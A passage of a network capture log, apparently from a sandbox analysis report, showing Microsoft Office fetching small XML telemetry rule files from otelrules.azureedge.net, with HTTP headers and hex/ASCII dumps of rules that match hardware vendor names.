                                            2024-12-03 08:57:53 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            35192.168.2.44978313.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:53 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:57:53 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:53 GMT
                                            Content-Type: text/xml
                                            Content-Length: 407
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                            ETag: "0x8DC582B9698189B"
                                            x-ms-request-id: 9f28f116-c01e-008d-51c7-432eec000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085753Z-174f7845968ljs8phC1EWRe6en00000015g0000000007gk6
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:57:53 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            36192.168.2.44978613.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:55 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:57:55 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:55 GMT
                                            Content-Type: text/xml
                                            Content-Length: 415
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                            ETag: "0x8DC582BA41997E3"
                                            x-ms-request-id: 6ab56c84-d01e-008e-48c7-43387a000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085755Z-174f7845968qj8jrhC1EWRh41s00000015pg000000004d69
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:57:55 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            37192.168.2.44978513.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:55 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:57:55 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:55 GMT
                                            Content-Type: text/xml
                                            Content-Length: 469
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                            ETag: "0x8DC582BBA701121"
                                            x-ms-request-id: a11b7610-d01e-00ad-11d5-43e942000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085755Z-174f7845968swgbqhC1EWRmnb400000015rg00000000apd2
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:57:55 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            38192.168.2.44978813.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:55 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:57:55 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:55 GMT
                                            Content-Type: text/xml
                                            Content-Length: 464
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                            ETag: "0x8DC582B97FB6C3C"
                                            x-ms-request-id: 3e0e4810-b01e-0084-040a-41d736000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085755Z-174f7845968px8v7hC1EWR08ng000000161g00000000187f
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:57:55 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            39192.168.2.44978713.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:55 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:57:55 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:55 GMT
                                            Content-Type: text/xml
                                            Content-Length: 477
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                            ETag: "0x8DC582BB8CEAC16"
                                            x-ms-request-id: e9babc56-001e-0049-5291-3f5bd5000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085755Z-174f7845968qj8jrhC1EWRh41s00000015ng000000005wb2
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:57:55 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            40192.168.2.44978913.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:55 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:57:55 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:55 GMT
                                            Content-Type: text/xml
                                            Content-Length: 494
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                            ETag: "0x8DC582BB7010D66"
                                            x-ms-request-id: 20b9087d-001e-0049-035f-435bd5000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085755Z-174f7845968cpnpfhC1EWR3afc000000159g000000005ux4
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:57:55 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            41192.168.2.44979013.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:57 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:57:57 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:57 GMT
                                            Content-Type: text/xml
                                            Content-Length: 419
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                            ETag: "0x8DC582B9748630E"
                                            x-ms-request-id: e044a7be-f01e-003c-0c76-438cf0000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085757Z-174f7845968pf68xhC1EWRr4h80000001600000000002ysw
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:57:57 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            42192.168.2.44979213.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:57 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:57:57 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:57 GMT
                                            Content-Type: text/xml
                                            Content-Length: 404
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                            ETag: "0x8DC582B9E8EE0F3"
                                            x-ms-request-id: 3f7caad5-701e-006f-6962-43afc4000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085757Z-174f7845968pf68xhC1EWRr4h800000015v0000000009k0y
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:57:57 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            43192.168.2.44979113.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:57 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:57:57 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:57 GMT
                                            Content-Type: text/xml
                                            Content-Length: 472
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                            ETag: "0x8DC582B9DACDF62"
                                            x-ms-request-id: 8889e7de-701e-003e-6ef2-4479b3000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085757Z-174f7845968cs2nkhC1EWR2tq000000001d0000000003h8e
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:57:57 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            44192.168.2.44979313.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:57 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:57:58 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:57 GMT
                                            Content-Type: text/xml
                                            Content-Length: 468
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                            ETag: "0x8DC582B9C8E04C8"
                                            x-ms-request-id: 5181e575-b01e-001e-206f-430214000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085757Z-174f7845968cdxdrhC1EWRg0en00000015sg000000000kn7
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-12-03 08:57:58 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            45192.168.2.44979413.107.246.63443
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:57 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-12-03 08:57:58 UTC470INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:57:58 GMT
                                            Content-Type: text/xml
                                            Content-Length: 428
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                            ETag: "0x8DC582BAC4F34CA"
                                            x-ms-request-id: 13f01659-601e-0084-129a-426b3f000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241203T085758Z-174f7845968px8v7hC1EWR08ng0000001610000000001v6g
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
